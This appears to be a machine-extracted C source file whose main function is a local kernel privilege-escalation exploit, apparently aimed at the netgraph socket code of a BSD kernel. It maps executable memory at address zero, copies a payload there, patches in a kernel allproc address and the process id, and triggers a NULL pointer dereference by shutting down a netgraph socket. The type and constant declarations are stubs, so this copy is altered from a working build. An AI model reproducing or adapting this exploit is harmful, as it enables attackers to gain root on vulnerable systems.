
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int ulong ;
typedef int uint ;
typedef int uchar ;


 int MAP_ANON ;
 void* MAP_FAILED ;
 int MAP_FIXED ;
 int NG_DATA ;
 int PAGES ;
 int PAGE_SIZE ;
 long PATTERN1 ;
 long PATTERN2 ;
 int PF_NETGRAPH ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SHUT_RDWR ;
 int SOCK_DGRAM ;
 int fprintf (int ,char*) ;
 int getpid () ;
 void* mmap (int *,int,int,int,int,int ) ;
 int perror (char*) ;
 int shutdown (int,int ) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 int strtoul (char*,int ,int ) ;
 scalar_t__ x ;

int
main(int argc, char * argv[])
{
 ulong addr;
 uchar * c;
 uchar * d;
 uint * i;
 void * v;
 int pid;
 int s;

 if(argc != 2)
 {
  fprintf(stderr, "usage: ./x <allproc>\n");
  return 1;
 }

 addr = strtoul(argv[1], 0, 0);

 v = mmap(
  ((void*)0),
  (PAGES*PAGE_SIZE),
  PROT_READ|PROT_WRITE|PROT_EXEC,
  MAP_ANON|MAP_FIXED,
  -1,
  0);
 if(v == MAP_FAILED)
 {
  perror("mmap");
  return 0;
 }

 c = v;
 d = (uchar * )x;
 while(1)
 {
  *c = *d;
  if(*d == 0xc3)
  {
   break;
  }

  d++;
  c++;
 }

 *c++ = 0xc3;

 c = v;
 while(1)
 {
  if(*(long * )c == PATTERN1)
  {
   *(c + 0) = addr >> 0;
   *(c + 1) = addr >> 8;
   *(c + 2) = addr >> 16;
   *(c + 3) = addr >> 24;
   break;
  }
  c++;
 }

 pid = getpid();
 while(1)
 {
  if(*(long * )c == PATTERN2)
  {
   *(c + 0) = pid >> 0;
   *(c + 1) = pid >> 8;
   *(c + 2) = pid >> 16;
   *(c + 3) = pid >> 24;
   break;
  }
  c++;
 }

 s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
 if(s < 0)
 {
  perror("socket");
  return 1;
 }

 shutdown(s, SHUT_RDWR);

 return 0;
}
